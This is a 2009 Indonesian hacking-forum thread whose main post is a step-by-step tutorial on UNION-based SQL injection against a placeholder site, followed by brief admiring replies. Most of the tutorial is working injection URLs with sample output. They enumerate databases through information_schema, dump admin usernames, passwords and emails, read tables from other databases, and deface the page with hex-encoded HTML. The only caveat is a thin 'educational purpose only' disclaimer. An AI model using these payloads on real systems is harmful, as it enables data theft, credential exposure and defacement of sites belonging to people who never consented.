[Tutorial] Advance SQL Injection

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
adwisatya
Posts: 30
Joined: Sun Jul 13, 2008 7:19 am
Contact:

[Tutorial] Advance SQL Injection

Post by adwisatya » Sun Dec 13, 2009 11:46 am

This paper is the advance of my first article. In this tutorial, we will try how to enter to the website deeper than normaly using SQL Injection.

1. The target is http://www.victim.gov/agent_detail.php?aid=9
We check the the site, is this site have bug. We only need to add single quote in last url. So the url be:
http://www.victim.gov/agent_detail.php?aid=9'
And error is appear.

2. We check number of column of that site.
To check number of column, we user "order by". Dont forget to add (-) after = and (--) at last URl
UR:
http://www.victim.gov/agent_detail.php?aid=-9 order by 1-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 2-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 3-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 4-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 5-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 6-- //error appear

because in "order by 6" error was apper so number of column is 5. The formula is n-1, which n is number of order by when error appear.

3. We check the number that can be exploitable.
We use "union all select"
UR:
http://www.victim.gov/agent_detail.php?aid=-9 union all select number_of_column!--
so:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,3,4,5--
The 1,2,3,4,5 is from number_colum, if the number_of_column is 3, so the query will be "union all select 1,2,3".

Number 3 appear. So 3 is exploitable number.

4. We check the version of that site.
We use "version()" . We only need to replace the exploitable number with version().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,version(),4,5--
and appear:
5.0.45-community-nt . We are luckly. We will able to know the name of database, table, and column.

5. We check the user of that site.
We use "user()" . We only need to replace the exploitable number with user().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,user(),4,5--
and appear:
root@localhost.
so the username is root.

6. We check the default database.
We use "database()" . We only need to replace the exploitable number with database()().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,database(),4,5--
and appear: "news"
so the default database of that site is "news".

7. We check all of database in that site.
We use "concat(schema_name) from information_schema.schemata"
We need to replace exploitable with "concat(schema_name)" and we must add "from information_schema.schemata" in the last url.
So the URl:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(schema_name),4,5 from information_schema.schemata--
You will see all of database in that site. Example:
news
information_schema
mysql
cms
connection
shop
etc

8. We check the name of table of that site (default database).
This is query if you want see the table name of default database.
We use "concat(table_name) from information_schema.tables where table_schema=database()"
We need to replace exploitable with "concat(table_name)" and we must add "from information_schema.tables where table_schema=database()" in the last url.
So the URl:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()--
You will see table name of that database. Example:
admin
config
news
etc

9. We check the name of the table (default database).
We use "concat(column_name) from information_schema.columns where table_name=0x[hexa]"
[hexa] is the result of convertation is we convert text to hex. Example the hex of "cms" is 636D73 and hex of "admin" is 61646D696E .
Example the table is "admin", so the URL will be:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_name=0x61646D696E--
And you see the name of column in that table. Example:
username
password
email
etc

10. Dump the data (default database).
We use "concat(column_name_1,0x3a,column_name_2,0x3a,column_name_n) from table_name"
3a is the result if we convert ":" to hex, it will separate each dumped data. Example we want to dump data in table admin, column username,password,email .
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(username,0x3a,password,0x3a,email),4,5 from admin--
And you see:
admin:becareful:[email protected]
the strusture:
admin --> username
: --> 0x3a
becareful --> password
: --> 0x3a
[email protected] --> email

We have learn how to dump from default database. So how about other database?

11. Check table_name of other database.
Example the other database is "cms"
We use "concat(table_name) from information_schema.tables where table_schema=0x[hex]" [hex] is the result when the convert name f the database to hex. The resulf if we convert "cms" to hex is 636D73.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=0x636D73--
And you see:
cms
cms_order
cms_user

12. Check column_name of following tables
Example the table is "cms_order"
We use "concat(column_name) from information_schema.columns where table_schema=0x[hex] and table_name=0x[hex]"
hex of "cms_order" is 636D735F6F72646572. So URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_schema=0x636D73 and table_name=0x636D735F6F72646572--
You will see:
order_id
order_reff

13. Dump data from following column.
Example the column_nane are order_id,order_reff
We use "concat(column_name,0x3a_column_name2) from database.table"
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(order_id,0x3aorder_reff),4,5 from cms.cms_order--
You will se the data :-) :-) :-) :-)

14. Fake deface using SQL injection
We only need convert html to hex.
example: <marquee>xyberbreaker</marquee> hex: 0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E
After that, replace exploitable number with it.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E,4,5--
You will see something good :-D


The end.
/////////////////////////////////////////////////////////////////////////////////////////
THIS IS FOR EDUCATIONAL PURPOSE ONLY. I AM NOT RESPONSIBLE OF ANYTHING READER DO.
"bagi yang menggunakan untuk kejahatan, dosa ditanggung sendiri".

http://xyber-breaker.blogspot.com
i'm not hacker, but i want to be hacker
http://www.lumajangcrew.org

User avatar
komporgas
Posts: 24
Joined: Sat Jan 05, 2008 4:09 pm
Location: PADANG
Contact:

Re: Advance SQL Injection

Post by komporgas » Sat Dec 19, 2009 3:24 pm

amazing
Kembangkan minat mu dan buktikan kemampuan mu
Jangan Sesekali Mampir di http://elco.teknikelektronika.net dan http://replayfrom.wordpress.com
Trimakasih ya :)

User avatar
peniru
Posts: 389
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar
Contact:

Re: Advance SQL Injection

Post by peniru » Sat Dec 19, 2009 10:21 pm

wuih.. ckckckck
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]

User avatar
wiLMaR_kiDz
Posts: 964
Joined: Fri Mar 27, 2009 1:03 pm
Location: internet
Contact:

Re: [Tutorial] Advance SQL Injection

Post by wiLMaR_kiDz » Sun Dec 20, 2009 6:57 pm

Ane dah prnah baca sih....He..
Keep share 0m... :kaca: :kaca:
lanjutkan prjalannya... :ngakak: :tapa:
regards,
ordinary user,-

blabard
Posts: 10
Joined: Fri Feb 06, 2009 9:18 am
Location: BSD City
Contact:

Re: [Tutorial] Advance SQL Injection

Post by blabard » Mon Dec 21, 2009 1:05 pm

nebwe ikutan baca ya om...

User avatar
adwisatya
Posts: 30
Joined: Sun Jul 13, 2008 7:19 am
Contact:

Re: [Tutorial] Advance SQL Injection

Post by adwisatya » Mon Dec 21, 2009 2:16 pm

@wiLMaR_kiDz, baca dimana bro?
i'm not hacker, but i want to be hacker
http://www.lumajangcrew.org

User avatar
wiLMaR_kiDz
Posts: 964
Joined: Fri Mar 27, 2009 1:03 pm
Location: internet
Contact:

Re: [Tutorial] Advance SQL Injection

Post by wiLMaR_kiDz » Mon Dec 21, 2009 4:55 pm

adwisatya wrote:@wiLMaR_kiDz, baca dimana bro?
di : http://xyber-breaker.blogspot.com/2009/ ... ction.html
alias blogny ente om...
sorry deh, alnya ane gk cek dulu c.. :putusasa: :putusasa:
jd malluw....
:malumalu: :malumalu: :malumalu:
regards,
ordinary user,-

User avatar
abah
Posts: 516
Joined: Sat Jul 12, 2008 4:26 pm
Location: Makassar
Contact:

Re: [Tutorial] Advance SQL Injection

Post by abah » Mon Dec 21, 2009 5:00 pm

mantap om hajar sekalian
[b]Ukhuwah Networking Group Indonesia[/b]
Alamat : Jalan Makmur Nomor 41 Kota Makassar Sulawesi Selatan
Home : 0411-454414 - 04112409679

[b]Hasbullah Masby[/b]
SMS : 087841085044
YM : [URL=ymsgr:sendIM?email.abah][img]http://www.software.ukhuwah.net/ym/online.gif[/img][/URL]

User avatar
adwisatya
Posts: 30
Joined: Sun Jul 13, 2008 7:19 am
Contact:

Re: [Tutorial] Advance SQL Injection

Post by adwisatya » Tue Dec 22, 2009 5:04 am

hhihihi,,

gak perlu malu om,, santai aja....
:-),,

kalau ada kekurangan, mohon ditambahkan ya..
i'm not hacker, but i want to be hacker
http://www.lumajangcrew.org

User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:

Re: [Tutorial] Advance SQL Injection

Post by 3xtr3m3b0y » Tue Dec 22, 2009 10:18 am

abah wrote:mantap om hajar sekalian
Weleh si abah maux maen hajar aja, aya naon atuh abah teh...???
Ingat, abah teh udah tua, inget ma Kayla 'n Ummi aja di rumah abah...
...n0 l1m17...

Post Reply

Return to “Web Hacking”